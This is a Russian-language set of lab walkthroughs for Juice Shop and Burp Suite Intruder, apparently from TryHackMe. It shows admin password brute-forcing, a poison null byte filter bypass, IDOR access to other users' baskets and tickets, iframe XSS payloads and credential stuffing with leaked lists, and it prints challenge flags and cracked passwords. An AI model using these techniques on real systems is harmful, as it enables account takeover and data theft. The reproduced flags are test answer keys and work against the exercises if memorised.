В этой задаче мы рассмотрим использование уязвимостей аутентификации. Говоря об уязвимостях в аутентификации, мы подразумеваем механизмы, подверженные манипуляциям. Именно эти механизмы, перечисленные ниже, мы и будем использовать.

Слабые пароли в учетных записях с высокими привилегиями.

Страницы восстановления пароля

Дополнительная информация: Неработающая аутентификация

Вопрос №1: Подберите пароль от учетной записи администратора методом перебора!

Мы использовали SQL-инъекцию для входа в учетную запись администратора, но пароль нам по-прежнему неизвестен. Давайте попробуем атаку методом перебора! Мы снова перехватим запрос на вход, но вместо отправки его через прокси, мы отправим его в Intruder.

Перейдите в раздел «Позиции», затем выберите кнопку «Очистить §» . В поле пароля поместите два символа § внутри кавычек. Уточним: § § — это не два отдельных поля ввода, а реализация кавычек в Burp, например, "" . Запрос должен выглядеть как на изображении ниже.

Тут просят подобрать паль админа, почту мы уже знаем.
(но лучше перебирать не в бурпе - java очень медленный язык и с большим массивом данных он будет долго и тяжко справляться)

В качестве полезной нагрузки мы будем использовать файл best1050.txt из пакета seclists (который можно установить с помощью команды: apt-get install seclists ).

Список можно загрузить по адресу: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt

После загрузки файла в Burp начните атаку. Вам потребуется отфильтровать запросы по статусу.

В случае неудачной попытки запроса будет отправлена ​​ошибка 401 Unauthorized.

В случае успешного запроса будет возвращен код 200 OK .

После завершения войдите в учетную запись, используя пароль.

пароль: admin123

You successfully solved a challenge: Password Strength (Log in with the administrator's user credentials without previously changing them or applying SQL Injection.)
Ответ: ff4aebffe31b0ffdea9bdd0207a16a3c01ac6c56

Вопрос №2: Сбросить пароль Джима!

3c3e2d6ef99b733b947e92f8e2a9ed08bf57ea63

5. А! Не смотри!

Веб-приложение должно безопасно и надежно хранить и передавать конфиденциальные данные. Однако в некоторых случаях разработчик может не обеспечить надлежащую защиту своих конфиденциальных данных, что делает их уязвимыми.

В большинстве случаев защита данных не применяется единообразно во всем веб-приложении, что делает некоторые страницы доступными для общественности. В других случаях информация утекает в открытый доступ без ведома разработчика, что делает веб-приложение уязвимым для атак.

Дополнительная информация: Раскрытие конфиденциальных данных

Мы скачаем файл acquisitions.md и сохраним его. Похоже, здесь есть и другие файлы, представляющие интерес.

После загрузки перейдите на главную страницу , чтобы получить флаг!

You successfully solved a challenge: Confidential Document (Access a confidential document.)
Ответ: 8d2072c6b0a455608ca1a293dc0c9579883fc6a5

Вопрос №2: Войдите в учетную запись MC SafeSearch!

После просмотра видеоклипа некоторые фрагменты песни особенно запомнились.

Он отмечает, что его пароль — « Mr. Noodles », но он заменил некоторые « гласные на нули », то есть заменил только буквы «о» на нули.

Теперь нам известно, что пароль к учетной записи mc.safesearch@juice-sh.op — « Mr. N00dles ».

You successfully solved a challenge: Login MC SafeSearch (Log in with MC SafeSearch's original user credentials without applying SQL Injection or any other bypass.)
Ответ: bb105418e73708ceccf1a7b2491f434b8f5230e4

Вопрос №3: Скачайте файл резервной копии!

Теперь вернёмся в папку http://10.112.152.24/ftp/ и попробуем загрузить package.json.bak. Но, похоже, мы получаем ошибку 403, которая указывает, что можно загрузить только файлы .md и .pdf.

Чтобы обойти это ограничение, мы воспользуемся обходным путем для символов, называемым «ядовитым нулевым байтом». Ядовитый нулевой байт выглядит так: %00 .

Примечание: поскольку мы можем загрузить его по URL-адресу , нам потребуется закодировать его в формат, закодированный по URL-адресу.

Теперь "пустой байт" будет выглядеть так: %2500 . Добавление этого и расширения .md в конец позволит обойти ошибку 403!

Почему это работает?

«Отравленный нулевой байт» — это, по сути, нулевой символ-терминатор. Поместив нулевой символ в строку в определенном байте, вы дадите серверу команду завершить строку в этой точке, обнулив остальную часть строки.

You successfully solved a challenge: Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.)
Ответ: cfdeea14e8f01b4952722fd0e4a77f1928593c9a

6. Кто управляет этой штуковиной?

Современные системы позволяют нескольким пользователям иметь доступ к разным страницам. Администраторы чаще всего используют страницу администрирования для редактирования, добавления и удаления различных элементов веб-сайта. Вы можете использовать такие страницы при создании веб-сайта с помощью таких программ, как Weebly или Wix.

Обнаружение уязвимостей или ошибок в системе контроля доступа будет классифицировано по одному из двух типов :

Горизонтальная эскалация привилегий

Это происходит, когда пользователь может выполнить действие или получить доступ к данным другого пользователя с тем же уровнем прав доступа.

Вертикальная эскалация привилегий

Это происходит, когда пользователь может выполнить действие или получить доступ к данным другого пользователя с более высоким уровнем прав доступа.

Источник: Packetlabs.net

Дополнительная информация: Нарушение контроля доступа

Вопрос №1: Зайдите на страницу администрирования!

Сначала откроем отладчик в Firefox .

(Или источники в Chrome .)

Это можно сделать, перейдя по соответствующей ссылке в меню «Веб-разработчики».

Затем мы обновим страницу и найдем файл JavaScript для main-es2015.js.

Затем мы перейдём на эту страницу по адресу : http://10.112.152.24/main-es2015.js

Чтобы преобразовать текст в читаемый формат, нажмите кнопку { } внизу.

Теперь выполните поиск по запросу "admin".

Вы встретите несколько разных слов, содержащих "admin", но нам нужно слово "path: administration".

Это указывает на страницу под названием " /#/administration ", как видно из пути к разделу "О программе" несколькими строками ниже, но перейти на неё, не войдя в систему, не получится.

Поскольку это страница администратора, логично, что для ее просмотра нам необходимо войти в учетную запись администратора .

Хороший способ предотвратить доступ пользователей к этой информации — загружать только те части приложения, которые им необходимы. Это предотвратит утечку или просмотр конфиденциальной информации, такой как страница администратора.

Вопрос №2: Посмотрите корзину покупок другого пользователя!

Войдите в свою учетную запись администратора и нажмите «Ваша корзина». Убедитесь, что Burp запущен, чтобы вы могли перехватить запрос!

Пересылайте каждый запрос, пока не увидите: GET /rest/basket/1 HTTP/1.1

Теперь мы изменим цифру 1 после /basket/ на 2.

Теперь отобразится корзина пользователя с ID 2. Вы можете сделать это и для других пользователей с ID, при условии, что у них есть корзина!

IDOR - получили доступ до чужой корзины.

Ответ: e6982b34b6734ceadd28e5019b251f929a80b815

Снова перейдите на страницу http://10.112.152.24 /#/administration и нажмите на значок корзины рядом с отзывом, отмеченным 5 звездами!

Ответ:78231b75c0b2180b7e964dcbb1ab3c3f58639f2e

7. Откуда это взялось?

XSS , или межсайтовый скриптинг, — это уязвимость, позволяющая злоумышленникам запускать JavaScript в веб-приложениях. Это одна из наиболее распространенных уязвимостей в веб-приложениях. Сложность таких уязвимостей варьируется от простых до чрезвычайно сложных, поскольку каждое веб-приложение обрабатывает запросы по-своему.

Существует три основных типа XSS -атак:

DOM (Special)

DOM XSS (Document Object Model-based Cross-site Scripting) использует HTML-среду для выполнения вредоносного JavaScript. Этот тип атаки обычно использует HTML-тег <script></script> .

Постоянное (на стороне сервера)

Постоянная XSS-атака — это JavaScript-код, который выполняется при загрузке сервером страницы, содержащей этот код. Она может возникать, когда сервер не проверяет данные пользователя при их загрузке на страницу. Такие атаки часто встречаются в сообщениях блогов.

Отражённый (на стороне клиента)

Отражённая XSS-атака — это JavaScript-код, выполняемый на стороне клиента веб-приложения. Чаще всего она встречается, когда сервер не проверяет правильность поисковых данных.

Дополнительная информация: Межсайтовая скриптовая атака (XSS)

Вопрос №1: Выполните DOM XSS-атаку!

Мы будем использовать элемент iframe с тегом `<alert>` на JavaScript:

<iframe src="javascript:alert(`xss`)">

Ввод этого текста в строку поиска вызовет всплывающее окно.

Обратите внимание, что мы используем iframe , который является распространенным HTML-элементом, встречающимся во многих веб-приложениях; существуют и другие элементы, которые также дают аналогичный результат.

Этот тип XSS, также называемый XFS (Cross-Frame Scripting), является одним из наиболее распространенных способов обнаружения XSS в веб-приложениях.

Веб-сайты, позволяющие пользователю изменять iframe или другие элементы DOM, с наибольшей вероятностью будут уязвимы для XSS-атак.

Почему это работает?

Обычно поисковая строка отправляет запрос на сервер, который затем возвращает соответствующую информацию, но именно здесь кроется недостаток. Без надлежащей проверки входных данных мы можем осуществить XSS-атаку на поисковую строку.

Вопрос №2: Выполните постоянную XSS-атаку!

Сначала войдите в свою учетную запись администратора .

Для этой атаки мы перейдём на страницу " Последний IP-адрес входа ".

Должно быть указано, что последний IP-адрес — 0.0.0.0 или 10.xxx.

Поскольку в лог записывается «последний» IP-адрес входа, мы сейчас выйдем из системы, чтобы в лог записался «новый» IP-адрес.

Убедитесь, что функция перехвата запросов Burp включена , чтобы она перехватывала запросы на выход из системы.

Затем перейдём на вкладку «Заголовки», где добавим новый заголовок:

Затем перенаправьте запрос на сервер!
При повторном входе в учетную запись администратора и переходе на страницу с IP-адресом последнего входа вы увидите предупреждение об XSS-атаке!

Зачем нам отправлять этот заголовок?

Заголовок True-Client-IP аналогичен заголовку X-Forwarded-For ; оба сообщают серверу или прокси-серверу IP-адрес клиента. Поскольку в заголовке отсутствует проверка подлинности, мы можем выполнить XSS-атаку.

Вопрос №3: Выполните отражённую XSS-атаку!

Во-первых, нам нужно правильно настроиться, чтобы выполнить отраженную XSS-атаку!

Войдите в свою учетную запись администратора и перейдите на страницу « История заказов ».

Там вы увидите значок « Грузовик », нажав на него, вы перейдете на страницу результатов отслеживания. Вы также увидите, что заказу присвоен идентификатор.

Вместо кода 5267-f73dcd000abcc353 мы будем использовать XSS-атаку с использованием iframe, <iframe src="javascript:alert(`xss`)">.

После отправки URL-адреса обновите страницу, и вы получите предупреждение о XSS-атаке!

Почему это работает?

На сервере будет таблица соответствия или база данных (в зависимости от типа сервера) для каждого идентификатора отслеживания. Поскольку параметр 'id' не проходит проверку перед отправкой на сервер, мы можем выполнить XSS-атаку.

Вопрос №1: Выполните DOM XSS-атаку!

4a31a4fe0954199566e360a873802bf64d0d0a84

Вопрос №2: Выполните постоянную XSS-атаку!

c37da14686b69a220fd9febd09bb9593e7d0539f

Вопрос №3: Выполните отражённую XSS-атаку!

305021787d3e9cd9cebc057a021c2504550bb3b6

8. Исследование!

Если вы хотите попробовать свои силы в более сложных заданиях, не рассмотренных в этой комнате, загляните в раздел /#/score-board/ на Juice-shop. Там вы сможете увидеть выполненные вами задания, а также задания различной сложности.

Перейдите на страницу /#/score-board/

2614339936e8282e2f820f023d4d998a1f95e02a

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

1. Введение

Добро пожаловать в номер "Burp Suite Intruder"!

В этой комнате мы рассмотрим модуль Intruder в Burp Suite , который обеспечивает автоматическую обработку запросов и позволяет выполнять такие задачи, как фаззинг и брутфорс. Если вы не знакомы с функционалом Proxy и Repeater в Burp Suite , рекомендуется пройти хотя бы комнату «Основы Burp» перед тем, как продолжить.

Модуль Intruder в Burp Suite — это мощный инструмент, позволяющий проводить автоматизированные и настраиваемые атаки. Он предоставляет возможность изменять определенные части запроса и выполнять повторяющиеся тесты с различными вариантами входных данных. Intruder особенно полезен для таких задач, как фаззинг и брутфорс, где необходимо проверять различные значения по отношению к целевому объекту.

Разверните целевую виртуальную машину, подключенную к этой задаче, нажав зеленую кнопку «Запустить машину» .

2. Что такое Intruder?

Intruder — это встроенный в Burp Suite инструмент фаззинга, позволяющий автоматически изменять запросы и проводить многократное тестирование с вариациями входных значений. Используя перехваченный запрос (часто из модуля Proxy ), Intruder может отправлять несколько запросов с немного измененными значениями на основе заданных пользователем конфигураций. Он служит различным целям, таким как подбор паролей в формах авторизации путем замены полей имени пользователя и пароля значениями из списка слов или выполнение фаззинговых атак с использованием списков слов для тестирования подкаталогов, конечных точек или виртуальных хостов. Функциональность Intruder сравнима с инструментами командной строки, такими как Wfuzz или ffuf .

Однако важно отметить, что, хотя Intruder можно использовать с Burp Community Edition, он имеет ограничения по количеству запросов, что значительно снижает его скорость по сравнению с Burp Professional. Это ограничение часто заставляет специалистов по безопасности полагаться на другие инструменты для фаззинга и перебора паролей. Тем не менее, Intruder остается ценным инструментом, и стоит научиться эффективно его использовать.

Давайте рассмотрим интерфейс Intruder:

На начальном этапе Intruder отображается простой интерфейс, где мы можем выбрать цель. Это поле будет уже заполнено, если запрос был отправлен из прокси (используя Ctrl + Iили щелкнув правой кнопкой мыши и выбрав «Отправить в Intruder»).

В Intruder есть четыре вкладки:

• Позиции : На этой вкладке мы можем выбрать тип атаки (который мы рассмотрим в следующем задании) и настроить место вставки полезных нагрузок в шаблон запроса.
• Полезные нагрузки : Здесь мы можем выбрать значения для вставки в позиции, определенные на вкладке «Позиции» . Доступны различные варианты полезных нагрузок, например, загрузка элементов из списка слов. Способ вставки этих полезных нагрузок в шаблон зависит от типа атаки, выбранного на вкладке «Позиции» . Вкладка «Полезные нагрузки» также позволяет изменять поведение Intruder в отношении полезных нагрузок, например, определять правила предварительной обработки для каждой полезной нагрузки (например, добавление префикса или суффикса, выполнение сопоставления и замены или пропуск полезных нагрузок на основе определенного регулярного выражения).
• Пул ресурсов : Эта вкладка не особенно полезна в Burp Community Edition. Она позволяет распределять ресурсы между различными автоматизированными задачами в Burp Professional. Без доступа к этим автоматизированным задачам эта вкладка имеет ограниченное значение.
• Настройки : Эта вкладка позволяет настроить поведение атаки. В основном она касается того, как Burp обрабатывает результаты и саму атаку. Например, мы можем помечать запросы, содержащие определенный текст, или определить ответ Burp как перенаправляющий (3xx) ответы.

Примечание: Термин «фаззинг» относится к процессу проверки функциональности или существования путем применения набора данных к параметру. Например, фаззинг для конечных точек в веб-приложении включает в себя взятие каждого слова из списка слов и добавление его к URL-адресу запроса (например, http ://MACHINE_IP/WORD_GOES_HERE) для наблюдения за ответом сервера.

3. Должности

При использовании Burp Suite Intruder для проведения атаки первым шагом является анализ позиций в запросе, куда мы хотим внедрить наши полезные нагрузки. Эти позиции сообщают Intruder о местах, куда будут внедрены наши полезные нагрузки (как мы рассмотрим в следующих заданиях).

Перейдём к вкладке «Позиции»:

Обратите внимание, что Burp Suite автоматически пытается определить наиболее вероятные места для внедрения полезной нагрузки. Эти места выделены зеленым цветом и заключены в разделительные знаки ( §).

В правой части интерфейса расположены следующие кнопки: Add §, Clear §, и Auto §:

• Эта Add §кнопка позволяет вручную задавать новые позиции, выделяя их в редакторе запросов и затем нажимая на кнопку.
• Кнопка Clear §удаляет все заданные позиции, предоставляя чистый холст, на котором мы можем определить свои собственные позиции.
• Кнопка Auto §автоматически пытается определить наиболее вероятные позиции на основе запроса. Эта функция полезна, если мы ранее удалили позиции по умолчанию и хотим их восстановить.

Следующая GIF-анимация демонстрирует процесс добавления, удаления и автоматического повторного выбора позиций:

Уделите время ознакомлению с функциями добавления, удаления и автоматического выбора позиций в интерфейсе Burp Suite Intruder.

4. Полезная нагрузка

На вкладке «Полезные нагрузки» в Burp Suite Intruder мы можем создавать, назначать и настраивать полезные нагрузки для нашей атаки. Эта подвкладка разделена на четыре раздела:

1. Комплекты полезной нагрузки :
• В этом разделе мы можем выбрать позицию, для которой хотим настроить набор полезной нагрузки, а также выбрать тип полезной нагрузки, которую хотим использовать.
• При использовании типов атак, допускающих только один набор полезной нагрузки (снайперская или таранная ) , в выпадающем списке «Набор полезной нагрузки» будет только один вариант, независимо от количества заданных позиций.
• Если мы используем типы атак, требующие нескольких комплектов полезной нагрузки (вилы или кассетная бомба), то в выпадающем списке для каждой позиции будет отдельный пункт.
• Примечание: При присвоении номеров в раскрывающемся списке «Набор полезной нагрузки» для нескольких позиций следуйте порядку сверху вниз, слева направо. Например, при наличии двух позиций ( username=§pentester§&password=§Expl01ted§), первый элемент в раскрывающемся списке набора полезной нагрузки будет относиться к полю имени пользователя, а второй — к полю пароля.
2. Настройки полезной нагрузки :
• В этом разделе представлены параметры, специфичные для выбранного типа полезной нагрузки в текущем наборе полезной нагрузки.
• Например, при использовании типа полезной нагрузки «Простой список» мы можем вручную добавлять или удалять полезные нагрузки из набора с помощью текстового поля «Добавить» , «Вставить строки» или «Загрузить полезные нагрузки из файла». Кнопка «Удалить» удаляет текущую выбранную строку, а кнопка «Очистить» очищает весь список. Будьте осторожны при загрузке больших списков, так как это может привести к сбою Burp.
• Для каждого типа полезной нагрузки предусмотрен свой набор опций и функциональных возможностей. Изучите доступные варианты, чтобы понять весь спектр возможностей.
3. Обработка полезной нагрузки :
• В этом разделе мы можем определить правила, которые будут применяться к каждому элементу полезной нагрузки в наборе перед его отправкой на целевое устройство.
• Например, мы можем сделать каждое слово заглавным, пропустить данные, соответствующие шаблону регулярного выражения, или применить другие преобразования или фильтрацию.
• Хотя вы, возможно, не будете часто использовать этот раздел, он может оказаться чрезвычайно полезным, когда для вашей атаки требуется специфическая обработка полезной нагрузки.
4. Кодирование полезной нагрузки :
• Этот раздел позволяет нам настраивать параметры кодирования для наших полезных нагрузок.
• По умолчанию Burp Suite применяет кодирование URL-адресов для обеспечения безопасной передачи данных. Однако могут быть случаи, когда необходимо изменить режим кодирования.
• Мы можем переопределить параметры кодирования URL-адреса по умолчанию, изменив список символов для кодирования или сняв флажок «Кодировать эти символы для URL-адреса».

Используя эти разделы, мы можем создавать и настраивать наборы полезных нагрузок в соответствии со специфическими требованиями наших атак. Такой уровень контроля позволяет нам точно настраивать полезные нагрузки для эффективного тестирования и эксплуатации.

5. Введение в типы атак

Вкладка «Позиции» в Burp Suite Intruder содержит выпадающее меню для выбора типа атаки. Intruder предлагает четыре типа атак, каждый из которых служит определенной цели. Давайте рассмотрим каждый из них:

1. Sniper - Снайперская атака : Тип атаки «Снайперская атака» является вариантом по умолчанию и наиболее часто используемым. Он циклически перебирает полезные нагрузки, внедряя по одной полезной нагрузке за раз в каждую позицию, определенную в запросе. Снайперские атаки последовательно перебирают все полезные нагрузки, что позволяет проводить точное и целенаправленное тестирование.
2. Battering ram - Таран : Тип атаки «Таран » отличается от «Снайперской атаки» тем, что он отправляет все полезные нагрузки одновременно, при этом каждая полезная нагрузка устанавливается на свою позицию. Этот тип атаки полезен при проверке условий гонки или когда необходимо одновременно отправлять полезные нагрузки.
3. Pitchfork - Атака типа «Вилы »: Атака типа «Вилы» позволяет одновременно тестировать несколько позиций с использованием различных полезных нагрузок. Она позволяет тестировщику определить несколько наборов полезных нагрузок, каждый из которых связан с определенной позицией в запросе. Атаки типа «Вилы» эффективны, когда существуют различные параметры, требующие отдельного тестирования.
4. Cluster bomb - Кассетная бомба : Тип атаки «Кассетная бомба» сочетает в себе подходы «Снайпер» и «Вилы». Она выполняет атаку, подобную снайперской, на каждой позиции, но одновременно проверяет все полезные нагрузки из каждого набора. Этот тип атаки полезен, когда несколько позиций имеют разные полезные нагрузки, и мы хотим проверить их все вместе.

Каждый тип атаки имеет свои преимущества и подходит для различных сценариев тестирования. Понимание их различий помогает нам выбрать подходящий тип атаки в зависимости от целей тестирования.

6. Снайпер

Тип атаки «Снайпер» — это тип атаки по умолчанию и наиболее часто используемый в Burp Suite Intruder. Он особенно эффективен для атак с захватом одной позиции, таких как подбор паролей методом перебора или фаззинг для API- интерфейсов. При атаке «Снайпер» мы предоставляем набор полезных нагрузок, которые могут представлять собой список слов или диапазон чисел, и Intruder вставляет каждую полезную нагрузку в каждую определенную позицию в запросе.

Давайте обратимся к нашему предыдущему примеру шаблона:

Примеры должностей

POST /support/login/ HTTP/1.1
Хост: 10.49.191.239
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Длина контента: 37
Источник: http:// 10.49.191.239
Соединение: закрыто
Источник: http:// 10.49.191.239 /support/login/
Запросы на обновление, небезопасные и некорректные: 1

имя пользователя = §pentester§ & пароль = §Expl01ted§              

В этом примере у нас определены две позиции для параметров тела usernameатаки password. В атаке типа «Снайпер» Intruder берет каждый полезный груз из набора полезных нагрузок и по очереди подставляет его в каждую определенную позицию.

Предположим, у нас есть список из трех слов: burp, suite, и intruder. Тогда Intruder сгенерирует шесть запросов:

Обратите внимание, как Intruder начинает с первой позиции ( username) и подставляет в нее каждую полезную нагрузку, затем переходит ко второй позиции ( password) и выполняет ту же замену полезных нагрузок. Общее количество запросов, сделанных Intruder Sniper, можно рассчитать как requests = numberOfWords * numberOfPositions.

Тип атаки «Снайпер» полезен, когда мы хотим провести тесты с атаками в одной позиции, используя разные полезные нагрузки для каждой позиции. Он позволяет проводить точное тестирование и анализ различных вариантов полезных нагрузок.

7. Таран

Тип атаки «Таран » в Burp Suite Intruder отличается от «Снайпера» тем, что он размещает один и тот же груз во всех позициях одновременно, а не заменяет каждый груз в каждой позиции по очереди.

Вернемся к нашему предыдущему примеру шаблона:

Примеры должностей

POST /support/login/ HTTP/1.1
    Хост: 10.49.191.239
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Длина контента: 37
    Источник: http:// 10.49.191.239
    Соединение: закрыто
    Источник: http:// 10.49.191.239 /support/login/
    Запросы на обновление, небезопасные и некорректные: 1
    
    имя пользователя = §pentester§ & пароль = §Expl01ted§              

Используя атаку типа «Таран» с тем же списком слов, что и раньше ( burp, suite, и intruder), Intruder сгенерирует три запроса:

Как показано в таблице, каждый фрагмент кода из списка слов вставляется в каждую позицию для каждого запроса. При атаке типа «таран» один и тот же фрагмент кода одновременно помещается в каждую определенную позицию, что обеспечивает подход к тестированию, подобный методу перебора.

Атака типа «таран » полезна, когда мы хотим проверить одну и ту же полезную нагрузку одновременно в нескольких позициях без необходимости последовательной замены.

В следующих заданиях мы рассмотрим дополнительные конфигурации и настройки, связанные с типом атаки «Таран» в игре Intruder , и изучим его применение в различных сценариях.

8. Вилы

Тип атаки «Вилы» в Burp Suite Intruder похож на одновременную атаку «Снайпер». В то время как «Снайпер» использует один набор полезной нагрузки для одновременной проверки всех позиций, «Вилы» используют один набор полезной нагрузки на каждую позицию (максимум до 20) и перебирают их все одновременно.

Чтобы лучше понять Pitchfork, давайте вернемся к нашему примеру с перебором, но на этот раз с двумя списками слов:

1. Первый список слов содержит имена пользователей: joel, harriet, и alex.
2. Второй список слов содержит пароли: J03l, Emma1815, и Sk1ll.

Мы можем использовать эти два списка для проведения атаки типа «вилы» на форму входа в систему. Каждый запрос, сделанный во время атаки, будет выглядеть следующим образом:

Как показано в таблице, Pitchfork берет первый элемент из каждого списка и подставляет его в запрос, по одному на позицию. Затем он повторяет этот процесс для следующего запроса, беря второй элемент из каждого списка и подставляя его в шаблон. Intruder продолжает эту итерацию до тех пор, пока один или все списки не исчерпают свои элементы. Важно отметить, что Intruder прекращает проверку, как только один из списков будет заполнен. Поэтому в атаках Pitchfork идеально, чтобы наборы полезной нагрузки имели одинаковую длину. Если длина наборов полезной нагрузки различается, Intruder будет отправлять запросы только до тех пор, пока не будет исчерпан более короткий список, а оставшиеся элементы в более длинном списке проверяться не будут.

Атака типа «Вилы» особенно полезна при проведении атак с подбором учетных данных или когда для нескольких позиций требуются отдельные наборы полезной нагрузки. Она позволяет одновременно тестировать несколько позиций с различными полезными нагрузками.

В следующих заданиях мы рассмотрим дополнительные конфигурации и настройки, связанные с типом атаки Pitchfork от Intruder, и изучим его применение в различных сценариях, включая атаки с подбором учетных данных.

9. Кассетная бомба

Тип атаки «Кластерная бомба» в Burp Suite Intruder позволяет выбирать несколько наборов полезной нагрузки, по одному на каждую позицию (максимум до 20). В отличие от Pitchfork, где все наборы полезной нагрузки проверяются одновременно, «Кластерная бомба» перебирает каждый набор полезной нагрузки по отдельности, гарантируя проверку каждой возможной комбинации полезных нагрузок.

Для иллюстрации типа атаки «Кластерная бомба» воспользуемся теми же списками слов, что и раньше:

• Имена пользователей: joel, harriet, и alex.
• Пароли: J03l, Emma1815, и Sk1ll.

В этом примере предположим, что мы не знаем, какой пароль принадлежит какому пользователю. У нас есть три пользователя и три пароля, но их соответствие неизвестно. В этом случае мы можем использовать атаку типа «кластерная бомба», чтобы перебрать все возможные комбинации значений. Таблица запросов для позиций имени пользователя и пароля будет выглядеть следующим образом:

Как показано в таблице, тип атаки «Кластерная бомба» перебирает все возможные комбинации предоставленных наборов полезной нагрузки. Он проверяет каждую возможность, подставляя каждое значение из каждого набора полезной нагрузки в соответствующую позицию в запросе.

Атаки типа «кластерная бомба» могут генерировать значительный объем трафика, поскольку проверяют каждую комбинацию. Количество запросов, выполняемых атакой типа «кластерная бомба», можно рассчитать, умножив количество строк в каждом наборе полезной нагрузки. Важно проявлять осторожность при использовании этого типа атаки, особенно при работе с большими наборами полезной нагрузки. Кроме того, при использовании Burp Community и его функции ограничения скорости Intruder выполнение атаки типа «кластерная бомба» с набором полезной нагрузки среднего размера может занять значительно больше времени.

Тип атаки «Кластерная бомба» особенно полезен для сценариев подбора учетных данных методом перебора, когда соответствие между именами пользователей и паролями неизвестно.

В следующих заданиях мы рассмотрим дополнительные конфигурации и настройки, связанные с типом атаки «Кластерная бомба» в Intruder, и изучим ее применение в различных сценариях.

10. Практический пример

Чтобы применить наши теоретические знания на практике, мы попытаемся получить доступ к порталу поддержки, расположенному по адресу [адрес портала] http://10.49.129.42/support/login. Этот портал имеет стандартную структуру авторизации, и, изучив его исходный код, мы обнаруживаем, что никаких мер защиты не реализовано:

Исходный код формы входа в систему поддержки

---
<form method="POST">
    <div class="form-floating mb-3">
        <input class="form-control" type="text" name=username  placeholder="Username" required>
        <label for="username">Username</label>
    </div>
    <div class="form-floating mb-3">
        <input class="form-control" type="password" name=password  placeholder="Password" required>
        <label for="password">Password</label>
    </div>
    <div class="d-grid"><button class="btn btn-primary btn-lg" type="submit">Login!</button></div>
</form>
---

Ввиду отсутствия защитных мер у нас есть несколько вариантов использования этой уязвимости, включая атаку кассетными бомбами для подбора учетных данных методом перебора. Однако в нашем распоряжении есть и более простой подход.

Примерно три месяца назад компания Bastion Hosting стала жертвой кибератаки, в результате которой были скомпрометированы имена пользователей, адреса электронной почты и пароли сотрудников в открытом виде. Хотя пострадавшим сотрудникам было рекомендовано незамедлительно сменить пароли, существует вероятность, что некоторые проигнорировали этот совет.

Поскольку у нас есть список известных имен пользователей, каждое из которых сопровождается соответствующим паролем, мы можем использовать атаку с подбором учетных данных вместо прямого перебора. Этот метод оказывается более выгодным и значительно быстрее, особенно при использовании версии Intruder с ограничением скорости запросов. Чтобы получить доступ к утёкшим учетным данным, загрузите файл с целевого компьютера, используя следующую команду в AttackBox: wget http://10.49.129.42:9999/Credentials/BastionHostingCreds.zip

Учебное пособие

Для решения этой задачи выполните следующие шаги, чтобы провести атаку с использованием украденных учетных данных с помощью макросов Burp:

1. Скачайте и подготовьте списки слов:
   Эти списки содержат информацию об утечках электронных писем, имен пользователей и паролей соответственно. Последний список содержит объединенные списки электронных писем и паролей. Мы будем использовать эти usernames.txtсписки passwords.txt.
• Скачайте и распакуйте файл BastionHostingCreds.zip.
• В извлеченной папке найдите следующие списки слов:
• emails.txt
• usernames.txt
• passwords.txt
• combined.txt
2. Перейдите по указанному адресу http://10.49.129.42/support/loginв вашем браузере. Активируйте Burp Proxy и попробуйте войти в систему, перехватив запрос в вашем прокси. Обратите внимание, что для этого шага подойдут любые учетные данные.

1. Отправьте перехваченный запрос из прокси-сервера в Intruder, щелкнув правой кнопкой мыши и выбрав «Отправить в Intruder» или используя Ctrl + I.

1. На вкладке "Позиции" убедитесь, что выбраны только параметры имени пользователя и пароля. Снимите все дополнительные флажки, такие как сессионные cookie.

1. Установите тип атаки на «Вилы».

1. Перейдите на вкладку "Полезные нагрузки". Вы найдете два набора полезных нагрузок, доступных для полей имени пользователя и пароля.

1. В первом наборе полезной нагрузки (для имен пользователей) перейдите в раздел «Параметры полезной нагрузки», выберите «Загрузить» и выберите нужный usernames.txtпункт из списка.

• Повторите тот же процесс для второго набора данных (для паролей), используя passwords.txtсписок.

1. Нажмите кнопку «Начать атаку» , чтобы начать атаку с использованием подбора учетных данных. Может появиться предупреждение об ограничении скорости запросов; нажмите «ОК» , чтобы продолжить. Атака займет несколько минут в Burp Community.

1. После начала атаки в новом окне отобразятся результаты запросов. Однако, поскольку Burp отправил 100 запросов, нам необходимо определить, какой из них (или какие) оказался (были) успешным. Поскольку коды состояния ответа не позволяют различать успешные и неудачные попытки (все они представляют собой перенаправления 302), нам необходимо использовать длину ответа для их различения. Чтобы отсортировать результаты по длине в байтах, щелкните заголовок столбца «Длина». Найдите запрос с меньшей длиной ответа, что указывает на успешную попытку входа в систему.

1. Для подтверждения успешной попытки входа в систему используйте учетные данные из запроса с более короткой длиной ответа.

получаем

Payload 1: m.rivera
Payload 2: letmein1

11. Практическая задача

Получив доступ к системе поддержки, мы теперь можем изучить ее функциональные возможности и посмотреть, какие действия мы можем выполнить.

При переходе на главную страницу отображается таблица с различными заявками. Нажатие на любую строку перенаправляет на страницу, где можно просмотреть полную заявку. Изучив структуру URL-адресов, мы видим, что эти страницы пронумерованы в следующем формате:

http://10.49.129.42/support/ticket/NUMBER

Система нумерации указывает на то, что билетам присваиваются целочисленные идентификаторы, а не сложные и трудноугадываемые номера. Эта информация важна, поскольку она предполагает два возможных сценария:

1. Контроль доступа : Конечная точка может быть правильно настроена для ограничения доступа только к заявкам, назначенным текущему пользователю. В этом случае мы можем просматривать только заявки, связанные с нашей учетной записью.
2. Уязвимость IDOR : Кроме того, на конечной точке могут отсутствовать надлежащие средства контроля доступа, что приводит к уязвимости, известной как небезопасные прямые ссылки на объекты (IDOR). В этом случае мы потенциально можем использовать уязвимость системы и прочитать все существующие билеты, независимо от назначенного пользователя.

Для дальнейшего исследования мы воспользуемся инструментом Intruder для фаззинга /support/ticket/NUMBERконечной точки. Этот подход поможет нам определить, правильно ли настроена конечная точка или присутствует ли уязвимость типа IDOR . Давайте приступим к процессу фаззинга!

забираем страничку в интрудер

